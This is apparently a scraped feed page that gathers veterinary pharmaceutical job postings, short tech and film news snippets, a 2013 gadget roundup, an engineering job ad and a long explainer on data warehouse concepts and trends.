+ Must be willing to submit to a background investigation, including verification of your past employment, criminal history, and educational background + Must be willing to take a drug test and post-offer physical (if required) + Must be 18 years of age or older **Our Culture:** Boehringer Ingelheim is a different kind of pharmaceutical company, a privately held company with the ability to have an innovative and long term view. Our focus is on scientific discoveries that improve patients' lives and we equate success as a pharmaceutical company with the steady introduction of truly innovative medicines. Boehringer Ingelheim is the largest privately held pharmaceutical corporation in the world and ranks among the world's 20 leading pharmaceutical corporations. At Boehringer Ingelheim, we are committed to delivering value through innovation. Employees are challenged to take initiative and achieve outstanding results. Ultimately, our culture and drive allows us to maintain one of the highest levels of excellence in our industry. Boehringer Ingelheim, including Boehringer Ingelheim Pharmaceuticals, Inc., Boehringer Ingelheim USA, Boehringer Ingelheim Roxane Inc., Roxane Laboratories Inc., Boehringer Ingelheim Chemicals, Boehringer Ingelheim Vetmedica Inc. Ben Venue Laboratories Inc. and Boehringer Ingelheim Fremont, Inc. is an equal opportunity employer. Minority/Female/Protected Veteran/Person with a Disability Boehringer Ingelheim is firmly committed to ensuring a safe, healthy, productive and efficient work environment for our employees, partners and customers. As part of that commitment, Boehringer Ingelheim conducts pre-employment background investigations and drug screenings. **Organization:** _US-Vetmedica_ **Title:** _Technical Manager - Dairy_ **Location:** _Americas-United States-GA-Duluth_ **Requisition ID:** _178704_
          (USA-GA-DULUTH) Technical Manager - Beef        
Boehringer Ingelheim is an equal opportunity global employer who takes pride in maintaining a diverse and inclusive culture. We embrace diversity of perspectives and strive for an inclusive environment which benefits our employees, patients and communities. **Description:** Responsible for providing technical direction and oversight for the application of existing and developing products in the marketing area. As an employee of Boehringer Ingelheim, you will actively contribute to the discovery, development and delivery of our products to our patients and customers. Our global presence provides opportunity for all employees to collaborate internationally, offering visibility and opportunity to directly contribute to the companies' success. We realize that our strength and competitive advantage lie with our people. We support our employees in a number of ways to foster a healthy working environment, meaningful work, diversity and inclusion, mobility, networking and work-life balance. Our competitive compensation and benefit programs reflect Boehringer Ingelheim's high regard for our employees. **Duties & Responsibilities:** + Lead technical components of Proof of Concept for potential new products. Design, implement, and report market support trials. Mine the data and distill the information to relevant messages. Provide input on financial projections for new product opportunities. + Provide technical support to marketing on all promotional pieces, programs including reference check, development of key technical statements, competitive analysis, technical review including the routing process, and ensuring that materials pass regulatory and legal review. + Provide technical sales support to Field Sales through customer interactions, on-site customer training, and handling customer inquiries. + Generate written and oral technical communications including scientific papers and presentations at professional meetings. Ensure technical accuracy of promotional communications. + Liaisons with appropriate Key Opinion Leaders. Provide technical training (internal and external) as it relates directly or indirectly to BIVI products. Create sales tools such as PowerPoint presentations and technical bulletins. + Build, explain, and utilize economic modeling for production agricultural utilization. Translate scientific and production data into commercial economic impact. + Performs all Company business in accordance with all regulations (e.g., EEO, FDA, etc.) and Company policy and procedures. When violations are noted/observed they are to be immediately reported to management. Demonstrates high ethical and professional standards with all business contacts in order to maintain BIVI's excellent reputation within the animal health community and internally. **Requirements:** + Doctoral degree in Veterinary + One (1) to three (3) years project leadership/management experience + Minimum three (3) years’ experience in the animal health industry + Well-developed communication skills – verbal and written + Proven experience in trial design and conduction including basic understanding of statistical analysis. **Eligibility Requirements:** + Must be legally authorized to work in the United States without restriction. 
+ Must be willing to submit to a background investigation, including verification of your past employment, criminal history, and educational background + Must be willing to take a drug test and post-offer physical (if required) + Must be 18 years of age or older **Our Culture:** Boehringer Ingelheim is a different kind of pharmaceutical company, a privately held company with the ability to have an innovative and long term view. Our focus is on scientific discoveries that improve patients' lives and we equate success as a pharmaceutical company with the steady introduction of truly innovative medicines. Boehringer Ingelheim is the largest privately held pharmaceutical corporation in the world and ranks among the world's 20 leading pharmaceutical corporations. At Boehringer Ingelheim, we are committed to delivering value through innovation. Employees are challenged to take initiative and achieve outstanding results. Ultimately, our culture and drive allows us to maintain one of the highest levels of excellence in our industry. Boehringer Ingelheim, including Boehringer Ingelheim Pharmaceuticals, Inc., Boehringer Ingelheim USA, Boehringer Ingelheim Roxane Inc., Roxane Laboratories Inc., Boehringer Ingelheim Chemicals, Boehringer Ingelheim Vetmedica Inc. Ben Venue Laboratories Inc. and Boehringer Ingelheim Fremont, Inc. is an equal opportunity employer. Minority/Female/Protected Veteran/Person with a Disability Boehringer Ingelheim is firmly committed to ensuring a safe, healthy, productive and efficient work environment for our employees, partners and customers. As part of that commitment, Boehringer Ingelheim conducts pre-employment background investigations and drug screenings. **Organization:** _US-Vetmedica_ **Title:** _Technical Manager - Beef_ **Location:** _Americas-United States-GA-Duluth_ **Requisition ID:** _178703_
          (USA-GA-DULUTH) Technical Manager - Swine        
Boehringer Ingelheim is an equal opportunity global employer who takes pride in maintaining a diverse and inclusive culture. We embrace diversity of perspectives and strive for an inclusive environment which benefits our employees, patients and communities. **Description:** Responsible for providing technical direction and oversight for the application of existing and developing products in the marketing area. As an employee of Boehringer Ingelheim, you will actively contribute to the discovery, development and delivery of our products to our patients and customers. Our global presence provides opportunity for all employees to collaborate internationally, offering visibility and opportunity to directly contribute to the companies' success. We realize that our strength and competitive advantage lie with our people. We support our employees in a number of ways to foster a healthy working environment, meaningful work, diversity and inclusion, mobility, networking and work-life balance. Our competitive compensation and benefit programs reflect Boehringer Ingelheim's high regard for our employees. **Duties & Responsibilities:** + Lead technical components of Proof of Concept for potential new products. Design, implement, and report market support trials. Mine the data and distill the information to relevant messages. Provide input on financial projections for new product opportunities. + Provide technical support to marketing on all promotional pieces, programs including reference check, development of key technical statements, competitive analysis, technical review including the routing process, and ensuring that materials pass regulatory and legal review. + Provide technical sales support to Field Sales through customer interactions, on-site customer training, and handling customer inquiries. + Generate written and oral technical communications including scientific papers and presentations at professional meetings. Ensure technical accuracy of promotional communications. + Liaisons with appropriate Key Opinion Leaders. Provide technical training (internal and external) as it relates directly or indirectly to BIVI products. Create sales tools such as PowerPoint presentations and technical bulletins. + Build, explain, and utilize economic modeling for production agricultural utilization. Translate scientific and production data into commercial economic impact. + Performs all Company business in accordance with all regulations (e.g., EEO, FDA, etc.) and Company policy and procedures. When violations are noted/observed they are to be immediately reported to management. Demonstrates high ethical and professional standards with all business contacts in order to maintain BIVI's excellent reputation within the animal health community and internally. **Requirements:** + Doctoral degree in Veterinary + One (1) to three (3) years project leadership/management experience + Minimum three (3) years’ experience in the animal health industry + Well-developed communication skills – verbal and written + Proven experience in trial design and conduction including basic understanding of statistical analysis. **Eligibility Requirements:** + Must be legally authorized to work in the United States without restriction. + Must be willing to take a drug test and post-offer physical (if required) + Must be 18 years of age or older **Our Culture:** Boehringer Ingelheim is one of the world’s top 20 pharmaceutical companies and operates globally with approximately 50,000 employees. 
Since our founding in 1885, the company has remained family-owned and today we are committed to creating value through innovation in three business areas including human pharmaceuticals, animal health and biopharmaceutical contract manufacturing. Since we are privately held, we have the ability to take an innovative, long-term view. Our focus is on scientific discoveries and the introduction of truly novel medicines that improve lives and provide valuable services and support to patients and their families. Employees are challenged to take initiative and achieve outstanding results. Ultimately, our culture and drive allows us to maintain one of the highest levels of excellence in our industry. We are also deeply committed to our communities and our employees create and engage in programs that strengthen the neighborhoods where we live and work. Boehringer Ingelheim, including Boehringer Ingelheim Pharmaceuticals, Inc., Boehringer Ingelheim USA, Boehringer Ingelheim Animal Health USA, Inc., Merial Barceloneta, LLC and Boehringer Ingelheim Fremont, Inc. is an equal opportunity and affirmative action employer committed to a culturally diverse workforce. All qualified applicants will receive consideration for employment without regard to race; color; creed; religion; national origin; age; ancestry; nationality; marital, domestic partnership or civil union status; sex, gender identity or expression; affectional or sexual orientation; disability; veteran or military status, including protected veteran status; domestic violence victim status; atypical cellular or blood trait; genetic information (including the refusal to submit to genetic testing) or any other characteristic protected by law. Boehringer Ingelheim is firmly committed to ensuring a safe, healthy, productive and efficient work environment for our employees, partners and customers. As part of that commitment, Boehringer Ingelheim conducts pre-employment verifications and drug screenings. **Organization:** _US-Vetmedica_ **Title:** _Technical Manager - Swine_ **Location:** _Americas-United States-GA-Duluth_ **Requisition ID:** _176908_
          (USA-GA-DULUTH) Technical Manager - Equine        
Boehringer Ingelheim is an equal opportunity global employer who takes pride in maintaining a diverse and inclusive culture. We embrace diversity of perspectives and strive for an inclusive environment which benefits our employees, patients and communities. **Description:** Responsible for providing technical direction and oversight for the application of existing and developing products in the marketing area. As an employee of Boehringer Ingelheim, you will actively contribute to the discovery, development and delivery of our products to our patients and customers. Our global presence provides opportunity for all employees to collaborate internationally, offering visibility and opportunity to directly contribute to the companies' success. We realize that our strength and competitive advantage lie with our people. We support our employees in a number of ways to foster a healthy working environment, meaningful work, diversity and inclusion, mobility, networking and work-life balance. Our competitive compensation and benefit programs reflect Boehringer Ingelheim's high regard for our employees. **Duties & Responsibilities:** + Lead technical components of Proof of Concept for potential new products. Design, implement, and report market support trials. Mine the data and distill the information to relevant messages. Provide input on financial projections for new product opportunities. + Provide technical support to marketing on all promotional pieces, programs including reference check, development of key technical statements, competitive analysis, technical review including the routing process, and ensuring that materials pass regulatory and legal review. + Provide technical sales support to Field Sales through customer interactions, on-site customer training, and handling customer inquiries. + Generate written and oral technical communications including scientific papers and presentations at professional meetings. Ensure technical accuracy of promotional communications. + Liaisons with appropriate Key Opinion Leaders. Provide technical training (internal and external) as it relates directly or indirectly to BIVI products. Create sales tools such as PowerPoint presentations and technical bulletins. + Build, explain, and utilize economic modeling for production agricultural utilization. Translate scientific and production data into commercial economic impact. + Performs all Company business in accordance with all regulations (e.g., EEO, FDA, etc.) and Company policy and procedures. When violations are noted/observed they are to be immediately reported to management. Demonstrates high ethical and professional standards with all business contacts in order to maintain BIVI's excellent reputation within the animal health community and internally. **Requirements:** + Doctoral degree in Veterinary + One (1) to three (3) years project leadership/management experience + Minimum three (3) years’ experience in the animal health industry + Well-developed communication skills – verbal and written + Proven experience in trial design and conduction including basic understanding of statistical analysis. **Eligibility Requirements:** + Must be legally authorized to work in the United States without restriction. + Must be willing to take a drug test and post-offer physical (if required) + Must be 18 years of age or older **Our Culture:** Boehringer Ingelheim is one of the world’s top 20 pharmaceutical companies and operates globally with approximately 50,000 employees. 
Since our founding in 1885, the company has remained family-owned and today we are committed to creating value through innovation in three business areas including human pharmaceuticals, animal health and biopharmaceutical contract manufacturing. Since we are privately held, we have the ability to take an innovative, long-term view. Our focus is on scientific discoveries and the introduction of truly novel medicines that improve lives and provide valuable services and support to patients and their families. Employees are challenged to take initiative and achieve outstanding results. Ultimately, our culture and drive allows us to maintain one of the highest levels of excellence in our industry. We are also deeply committed to our communities and our employees create and engage in programs that strengthen the neighborhoods where we live and work. Boehringer Ingelheim, including Boehringer Ingelheim Pharmaceuticals, Inc., Boehringer Ingelheim USA, Boehringer Ingelheim Animal Health USA, Inc., Merial Barceloneta, LLC and Boehringer Ingelheim Fremont, Inc. is an equal opportunity and affirmative action employer committed to a culturally diverse workforce. All qualified applicants will receive consideration for employment without regard to race; color; creed; religion; national origin; age; ancestry; nationality; marital, domestic partnership or civil union status; sex, gender identity or expression; affectional or sexual orientation; disability; veteran or military status, including protected veteran status; domestic violence victim status; atypical cellular or blood trait; genetic information (including the refusal to submit to genetic testing) or any other characteristic protected by law. Boehringer Ingelheim is firmly committed to ensuring a safe, healthy, productive and efficient work environment for our employees, partners and customers. As part of that commitment, Boehringer Ingelheim conducts pre-employment verifications and drug screenings. **Organization:** _US-Vetmedica_ **Title:** _Technical Manager - Equine_ **Location:** _Americas-United States-GA-Duluth_ **Requisition ID:** _176466_
          Distributed computing in JavaScript        

We’ve heard about the idea of using browsers as distributed computing nodes for a couple years now. It’s only recently, with the race towards faster JavaScript engines in browsers like Chrome that this idea seems useful. [Antimatter15] did a proof of concept JavaScript implementation for reversing hashes. Plura Processing uses a Java applet to do distributed processing. Today, [Ilya Grigorik] posted an example using MapReduce in JavaScript. Google’s MapReduce is designed to support large dataset processing across computing clusters. It’s well suited for situations where computing nodes could go offline randomly (i.e. a browser navigates away from your site). He …read more


          The Dude Designs to take us for a ‘Teddy Bears Picnic’        
Premiering at FrightFest in London on the 28th August, Teddy Bears Picnic is a proof of concept horror short from Tom Hodge – aka The Dude Designs – the poster artist behind artwork for films such as Hobo with A Shotgun (2011), The Innkeepers (2011), The Heat (2013), WolfCop (2014), The Other Side of The Door […]
          Converus a Finalist for the 2017 Red Herring Top 100 North America Award        

Converus has been honored with one of the tech industry’s most prestigious awards. The company is a finalist for Red Herring’s Top 100 North America award. Finalists are among the most innovative and brightest private ventures in North America. Their place among the tech elite has been determined by Red Herring’s editorial team, during a many months-long process that considers criteria including disruptive impact, proof of concept, financial performance, market footprint and quality of management.

The post Converus a Finalist for the 2017 Red Herring Top 100 North America Award appeared first on Converus EyeDetect.


          [Screencast] KMix QML Applet, the real one        
When I started writing my last blog post, exactly two weeks ago, I never imagined that I would receive so much positive feedback and so many responses for a project that, as I’ve always restated, was just a proof of concept and nothing more. Anyway, that experiment (and the act of sharing it with the community) led, […]
          Digital Engineering Manager - San Marcos        
Aethercomm designs and manufactures high power RF and microwave amplifiers for use in CW and pulsed applications. Aethercomm covers the frequency range from DC to 40 GHz. Aethercomm products are used in radar systems, electronic warfare systems, communication systems and test and measurement applications. Aethercomm also designs and manufactures transmitters, transceivers and RF/microwave subsystems and systems. Aethercomm's design and manufacturing facilities are located in San Marcos, CA in San Diego County. We are currently looking for a highly motivated Digital Engineering Manager. In this position, you will direct a small group of Electrical Engineers. Also, participate in the full development cycle from conception to final testing of signal processing and data acquisition PCB cards. Specifically, gather requirements and contribute to the design of circuit boards, implement high speed parallel processing, Xilinx FPGA development using VHDL, Xilinx System Generator, and Xilinx Integrated Software Environment (ISE). Develop embedded DSP applications utilizing FIR filters and FFT modules, develop and evaluate testing methodologies, and test prototype to verify performance consistent with established specifications. You will help drive technology into products and keep engineers aware of relevant new technology. This position will be responsible for proof of concept and design changes using MATLAB and Simulink. Develop signal-processing design to increase amplifier linearization for the project. Develop algorithm to improve the performance of the system. Develop software design, including specification, analysis, design, implementation coding, interface development, debugging, testing, documentation and support. Support hardware in making design needed for analog filtering, noise reduction, lower power consumption, control unit design, software interface, chip evaluation, testing unit design. Design test equipments and user interfaces for raw data collection, production testing which will assist algorithm development, performance testing and maintain databases. A Bachelor's degree (B. S.) from a four-year college or university in the electronics or computer engineering, and 5 years of related experience, or a Master's degree and 3 years of related experience. Excellent written and verbal communication skills are needed to work with suppliers and other staff members. Candidates must be motivated team players. US Citizenship required. Excellent benefit package including health, dental, vision, vacation and 401k plan. To learn more about us, please visit our website at [link removed] Please submit resume and cover letter along with salary requirements.
          Consumer Reports pulls Microsoft Surface recommendation, citing high breakage rates        
 The Surface line has been a surprising hit for Microsoft in recent years. What many regarded as little more than a proof of concept for Windows 10 has become a leader in the two-in-one tablet category in its own right. But according to a new survey conducted by Consumer Reports, the devices have proven far more unreliable than much of the competition. In fact, things are so bad, the publication… Read More
          Grading The LEGO Batman Movie: Animal Logic and FilmLight        
Following successful collaborations on The Matrix, Legends of the Guardians, and Happy Feet, Sydney's Animal Logic worked with Warner Bros on The LEGO Movie from pitch to proof of concept to post. Animal Logic has gone even further on the latest LEGO animated feature, The LEGO Batman Movie, where th
          2013: Five gizmos that rocked        

Have we really invented most of what there was to invent? Unlikely. But big new products have become few and far between. And in 2013, various big tech launches landed with varying thuds. Both hardware (HP's Chromebook 11, Nintendo's Wii U console, the Surface tablet) and software.

BlackBerry's much-awaited BB10 operating system was launched in January, but fizzled out, crushed by unexciting, overpriced products. Windows 8, launched the previous year, flopped, and in an ever-so-unrelated move, Microsoft's Steve Ballmer announced that he would step down next year.

Yet there were some great gadgets this year: Many new-and-improved ones, and a few all-new products. Here's my pick of five that rocked:

THE iPad Air

The Air shows us what 2013 was mostly about: improvements. If Apple's new iPhones were totally underwhelming, it made up with the iPad Air.

This is an overhauled iPad that looks like a big iPad Mini. It's the lightest 10-inch tablet around. It's super-thin, though at 7.5 mm it's beaten by the FTV-model-like Sony Xperia Tablet Z (6.9 mm).

Sadly, the iPad Air is way overpriced, at Rs.51,900 in India for the 32 GB cellular model. And it retains its 5 Mp camera, instead of moving up to the iPhone 5's 8 Mp. But it's stunning (complete with Retina display), packs iWorks and other great software, and works superbly well - retaining its 8-10 hour charge despite the smaller battery.

THE SMARTWATCH

"Wearables" in the form of smartwatches were the rage in tech shows. The crowd-funded PEBBLE was first off the mark, backed by 69,000 people pledging $10 million. It sold about 100,000 smartwatches.

And then Samsung launched the GALAXY GEAR. This watch runs apps, handles voice calls and text messages, and takes pictures and videos, working as a companion to a few Galaxy smartphones. That's limiting, but it's still the first smartwatch from a big brand, and Samsung quickly claimed 800,000 shipments (many were returned).

It's very early days. This gear is expensive at Rs.23,000, has poor battery life, glitchy software, and very few apps. It's in many "flops of 2013" lists, but it's too early for that. Just wait for the Gear 2, expected next March, and many more.

NOKIA LUMIA 1020

Smartphone cameras have gotten very good over the past two years. There are impressive cameras in the iPhone 5 (8 Mp) and Samsung Galaxy S4 (13 Mp). To prove that it isn't about megapixels, the HTC One has a great 4 Mp, low-light camera.

The big leap forward was the Nokia Lumia 1020. Its whopping 41 Mp camera could have set off another megapixel rat race, but it isn't about the megapixels behind that Carl Zeiss lens, but how well they're used. Even with low-resolution everyday photos.

Or you can take high-res photos and later crop and zoom digitally without decreasing image quality. And the 1020 now supports the uncompressed RAW digital format preferred by pro photographers.

As smartphone, overall, the Lumia 1020 is far from the top. It runs Windows, which is still rather challenged on the apps front, even with Instagram and other popular apps added. But if you want a great camera with a phone, or if you're a photographer looking for a backup camera and a backup phone, this is it.

THE MACBOOK AIR

Apple's 2012 Air, which I'm writing this on, was already the sexiest notebook around. What the 2013 Air did was to take this stunning device and double its battery life to 12 hours for the 13-inch model, with higher performance and a lower price. Inside it, Intel's thrifty new Haswell chip helped a lot.

At about Rs.62,000, the 11-inch Air is now great value. Especially with all the free software: Pages, Numbers and Keynote, included. No Microsoft Office required.

Sure, for that price you might squeeze in more specs into a Windows notebook, but that's missing the point. The Air makes a statement like no other on this side of the Rs.100,000-mark, and it works superbly (even with Windows, if you should choose to install that). It's fast, and uses solid-state storage. The MacBook Air is the benchmark other notebook vendors will still be looking to in 2014.

GOOGLE GLASS

This is the converged future: eyewear meets personal computing, Mission Impossible meets real life.

You wear it like spectacles, and see a smartphone-like display in front of your eye. You can speak to it, telling it to do things. Next year, it should be integrated with regular glasses and sunglasses.

It's a product from Google X, the search giant's mystery division that's worked on other future tech such as driverless cars. Glass is not a mass-manufactured product yet, but a proof of concept-now being tested among selected buyers, in its Explorer Edition ($1,500).

Glass should reach store shelves some time in 2014 -- changing the wearables market forever.


          Turn your room into a giant screen with Microsoft’s Illumiroom        
Standing as a proof of concept, IllumiRoom is a bit like ambient lighting on crack, for gamers. It's a really smart projector that turns your external gaming environment into part of the video game's map.
                  
What is a Data Warehouse?


As defined by Bill Inmon: A data warehouse is a subject-oriented, integrated, time-variant and non-volatile collection of data in support of management's decision-making process.


What does this mean in the real world, in terms of real data?


It is a collection of operational and analytical data from multiple sources, brought together into a single database system. The business then queries this database and builds reports that help it make business decisions.


Today we have traditional data warehouses that store historical data, but this trend is going to change in the near future, as businesses ask for near-real-time data to make quick decisions and deliver business solutions.

Before turning to future trends, let's discuss the core data warehouse concepts.
Several concepts are of particular importance to data warehousing. They are discussed in detail in this section.



Dimensional Data Model: The dimensional data model is most often used in data warehousing systems. This is different from the third normal form (3NF) commonly used for transactional (OLTP) systems. As you can imagine, the same data would be stored differently in a dimensional model than in a 3NF model.
To understand dimensional data modeling, let's define some of the terms commonly used in this type of modeling:
Dimension: A category of information. For example, the time dimension.
Attribute: A unique level within a dimension. For example, Month is an attribute in the Time Dimension.
Hierarchy: The specification of levels that represents the relationships between different attributes within a dimension. For example, one possible hierarchy in the Time dimension is Year → Quarter → Month → Day.
Fact Table: A fact table is a table that contains the measures of interest. For example, sales amount would be such a measure. This measure is stored in the fact table with the appropriate granularity. For example, it can be sales amount by store by day. In this case, the fact table would contain three columns: A date column, a store column, and a sales amount column.
Lookup Table: The lookup table provides the detailed information about the attributes.
A dimensional model includes fact tables and lookup tables. Fact tables connect to one or more lookup tables, but fact tables do not have direct relationships to one another. Dimensions and hierarchies are represented by lookup tables. Attributes are the non-key columns in the lookup tables.
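
To make this concrete, here is a minimal illustrative sketch (the table and column names are invented for the example, and SQLite stands in for a real warehouse platform) of a sales fact table joined to a Time lookup table and rolled up along the hierarchy:

import sqlite3

# Illustrative star-schema fragment: one fact table and one lookup (dimension) table.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE dim_time (
    date_key   INTEGER PRIMARY KEY,   -- e.g. 20240131
    day        INTEGER,
    month      INTEGER,
    quarter    INTEGER,
    year       INTEGER
);
CREATE TABLE fact_sales (
    date_key     INTEGER REFERENCES dim_time(date_key),
    store_key    INTEGER,             -- would reference a dim_store lookup table
    sales_amount REAL                 -- the measure, at store-by-day granularity
);
""")
conn.execute("INSERT INTO dim_time VALUES (20240131, 31, 1, 1, 2024)")
conn.execute("INSERT INTO fact_sales VALUES (20240131, 42, 199.90)")

# Roll the measure up along the Time dimension hierarchy (here: by year).
for row in conn.execute("""
    SELECT t.year, SUM(f.sales_amount)
    FROM fact_sales f JOIN dim_time t ON f.date_key = t.date_key
    GROUP BY t.year"""):
    print(row)   # (2024, 199.9)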


Slowly Changing Dimension: The "Slowly Changing Dimension" problem is a common one particular to data warehousing. In a nutshell, this applies to cases where the attribute for a record varies over time.
Type 1: The new record replaces the original record. No trace of the old record exists.
Type 2: A new record is added into the customer dimension table. Therefore, the customer is treated essentially as two people.
Type 3: The original record is modified to reflect the change, typically by adding a column that preserves the previous value alongside the current one (a sketch of all three types follows below).
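
As a rough sketch of the difference between the three types (plain Python dictionaries stand in for the customer dimension table; all names are illustrative):

# Slowly Changing Dimension handling, sketched on plain dictionaries.
customer_dim = [{"customer_key": 1, "name": "Alice", "city": "Boston"}]

def scd_type1(dim, key, new_city):
    # Type 1: overwrite in place; no trace of the old value is kept.
    for row in dim:
        if row["customer_key"] == key:
            row["city"] = new_city

def scd_type2(dim, key, new_city):
    # Type 2: add a new row; the customer now appears as two records.
    old = next(r for r in dim if r["customer_key"] == key)
    dim.append({**old,
                "customer_key": max(r["customer_key"] for r in dim) + 1,
                "city": new_city})

def scd_type3(dim, key, new_city):
    # Type 3: modify the original row but keep the previous value in an extra column.
    for row in dim:
        if row["customer_key"] == key:
            row["previous_city"] = row["city"]
            row["city"] = new_city

scd_type3(customer_dim, 1, "Chicago")
print(customer_dim)   # city updated, previous_city preserved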

Conceptual, Logical, and Physical Data Model:


[Figure: Conceptual Model Design – the highest-level view, showing only the main entities and the relationships between them.]

[Figure: Logical Model Design – adds the attributes and keys of each entity, independent of any particular database product.]

[Figure: Physical Model Design – the actual tables, columns, data types and indexes as they will be implemented in the target database.]


Data Integrity: Data integrity refers to the validity of data, meaning data is consistent and correct. In the data warehousing field, we frequently hear the term, "Garbage In, Garbage Out." If there is no data integrity in the data warehouse, any resulting report and analysis will not be useful.
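
One common way to protect integrity is a validation step in the load process that rejects bad rows before they reach the warehouse. The sketch below uses made-up rules purely for illustration:

# Minimal load-time integrity checks; the rules here are illustrative only.
def validate_row(row):
    errors = []
    if row.get("sales_amount") is None or row["sales_amount"] < 0:
        errors.append("sales_amount missing or negative")
    if not row.get("date_key"):
        errors.append("date_key missing")
    return errors

rows = [{"date_key": 20240131, "sales_amount": 199.90},
        {"date_key": None, "sales_amount": -5.0}]

clean = [r for r in rows if not validate_row(r)]
rejected = [(r, validate_row(r)) for r in rows if validate_row(r)]
print(len(clean), "rows loaded,", len(rejected), "rows rejected")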


If an organisation wants to build a data warehouse, what are the key things to keep in mind?

1> Information Cycle:-
         A data warehouse project relies as much on business involvement as it does on the delivery team. The need for communication and involvement is best shown in a diagram that we have called the 'Information Cycle'.
         The information that is produced by the system should not only enable business users to see data but should encourage business actions (e.g. revising pricing policies, changing credit agreements, customer communications) that in turn lead to new data being produced. It is this new data that provides much of the value to the business. The data becomes a visible part of the customer lifecycle, which in turn leads to the ability to report on and exploit more information.

The system will always continue to be fed from the core operational data sources so that the historic knowledge of the customer base continues to grow.

Lastly, an on-going communication cycle of the business needs (requirements) and the delivery of new capabilities will ensure that the system will remain in line with changes in the organisation as the business grows and develops.



2> Initial Phases to Delivery:-


There are two initial phases to the delivery of a data warehouse: business requirements capture and data model design.
Business Requirements Capture
     In order to develop a system such as this, there are many phases that the project must progress through. The initial phases of requirements capture are encompassed within these four documents.


Often an organisation will have undertaken many such activities and as such this set of requirements should be created through a process of consolidating the existing requirements and supplementing them with any additional ones that have been uncovered during the production of the document.


Data Model Design
    In simple terms, the data model can be seen as a framework into which data can be entered. It is a way of representing the information so that it is performant, integrated, flexible and trusted.


The business requirements provide a way of testing whether the data model meets the current, short- and medium-term information needs.


3> Boundaries of Objectives :-



There is no way that a perfect solution to the business requirement can be developed and, as such, boundaries need to exist on the definitions of ‘performant’, ‘integrated’, ‘flexible’ and ‘trusted’.


These boundaries have been scoped at a high level and are detailed below. If the business feels strongly about any particular issue raised here, then it needs to be added to these documents as a specific requirement.


Performance


A data warehouse system is not normally described in the same terms as an operational data entry system, where times are described in seconds between screens etc. There are two major factors in performance: the first is the time taken to design and build a report, and the second is the time taken to run the report or queries.


The design and build of a report will depend upon the development of an agreed SLA between the delivery team and the business; it is suggested that any given report should not normally take more than one week to produce. The number of new report requests will have a direct effect upon the ability to deliver. However, with the eventual introduction of additional tools there should be an overall increase in the delivery of timely information to the business.


The time to run a report or query against the system is a more difficult performance issue. As a rule, any reports which are required regularly can be produced each day/week/month, dependent upon requirements, or even tuned to run in very responsive times upon request. However, there will always be a number of ad hoc reporting requests that will take considerable time to produce; these will need to be addressed on a case-by-case basis. When queries are being run directly by users, response times will vary wildly based upon the question being asked. Often a question that is simple to articulate in words can take considerable time to run in a data warehouse. Over time the warehouse can be tuned to cope with the most common types of queries.


Integration


Integration is the ability to bring data together from many sources. The model must be capable of supporting the important data items from many sources and be able to combine them together in a meaningful fashion. Thus two systems that each hold a record of customer information should produce one record within the solution which is the sum of the information from both systems.


The result of such integration is that questions can be asked of the system that correlate information from many sources, something that today is done by manual processing and re-keying information into a spreadsheet. The business requirements are used to identify which information is required and therefore allow the development team to identify the systems and the priorities for integration.



Flexibility


The flexibility of the solution is based around its ability to deal with change. There are some givens:


• The organisation will continue to trade both with individuals and with organisations.


• The trade will continue to be in the area of current market place, although the types of products/technology that are used will differ and consequently the billing of the product will also differ.


• There will be new methods of payment and differing payment plans to suit customers' needs. All of these are factored in where known and should be designed to be easy to add when they are discovered in the future.


• It is also assumed that the organisation will continue to market themselves but that the method (e.g. sales channels or regions etc.) of both sales and marketing will change over time and use different multiple concurrent media to carry on that exercise. The solution should be able to utilise new organisational structures and communication media quickly when implemented.


• No assumption is made about where the organisation will operate and therefore the possibility of US (dollar) and European (Euro) trading needs to be explicitly incorporated.


• Given these boundaries on flexibility the aim is to be able to change the system in line with the way in which the organisation develops its business model. Current and planned business requirement articulated will allow the testing of the model to meet these goals.


Trusted


A trusted system is one in which the quality and timeliness of data that is loaded is understood. This does not imply that information is perfect, but that the imperfections are known and quantified in such a way that the business can determine the value of the information that it is looking at.


Quality is made up of a number of factors such as cleaning the data, knowing where data is missing and how much data has been lost, and identifying human factors in data entry, where information reflects the way the system is used rather than explicit data characteristics. There are many such elements that must be considered and presented as a ‘confidence factor’ to the user.


Timeliness is the ability to present data as information to the user in an acceptable timeframe after it has been created. This cannot be defined as ‘3 minutes later’ but varies with context. For example, an engineer may record ‘job completion’ on a daily or weekly basis. Timeliness in this context may be a day or two later. Other events may be required in much shorter time scales.


These factors lead to an ‘auditability’ of information that allows analysts to trace back information in the solution, through any changes it has undergone to its origin.




Future Trends in Data Warehousing:-


The future will bring a level of complexity and business importance that will raise the bar for all of us. The real-time implementation of a business action, decision or change of direction that is based on the results of strategic data analysis is now the reality. The data issues surrounding this trend aren't getting any easier or smaller. Combine the need for real-time data warehousing and increased data size and complexity, and we set the stage for a new type of warehouse – the "virtual" enterprise data warehouse. This virtual DW or private hub for both operational and informational needs will begin to drive new demands on the ability of organizations to assimilate vast data assets stored in merged/acquired companies or divisional enterprise resource planning (ERP) and legacy environments. The time needed to integrate all the operational systems will make the traditional method of data integration impractical. This intersection of Web channels and data warehousing has the potential to become the standard architecture for large, complex organizations.



It’s the most sophisticated form of data management in the IT house, and it’s about to get even bigger. In fact, data warehousing is now labeled “mission-critical” by Gartner analysts. The data warehouse is expected to remain the key component of the IT infrastructure, “one of the largest—if not the largest—information repository in the enterprise.” Here are the top 9 data warehousing trends of the future.


1. Optimization and Performance
Data warehousing will use optimization and performance as a differentiator in addition to focusing on the issue of optimizing storage for warehouses via compression and usage-based data placement strategies.


2. Data Warehouse Appliances
Appliances are the next big thing – mostly because of their simplicity. The vendor builds and certifies the configuration, balancing hardware, software and services for predictable performance. Appliances also install rapidly and can speed delivery by avoiding time-consuming hardware balancing.


3. The Intensive POC
Gartner recommends that POCs (proof of concept) use as much real source-system extracted data (SSED) from the operational systems as possible, while performing the POC with as many users as possible, creating a data warehouse workload that approaches that of the environment to be used in production.


4. Data Warehouse Mixed Workloads
There are six workloads that are delivered by the data warehouse platform: bulk/batch load, basic reporting, basic online analytical processing (OLAP), real-time/continuous load, data mining and operational BI. Warehouses delivering all six workloads need to be assessed for predictability of mixed-workload performance; failing to plan for mixed workloads will lead to increased administration costs over time as volume and additional workloads are added, potentially creating major sustainability issues.


5. The Resurgence of Data Marts
Data mart usage will increase throughout 2011 and 2012 due to their effectiveness in optimizing the warehouse environment by offloading part of the workload to the data mart.


6. Column-Store DBMSs (Database Management System)
Column-store DBMSs generally exhibit faster query response than traditional, row-based systems and can serve as excellent data mart platforms, and even as a main data warehouse platform.
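
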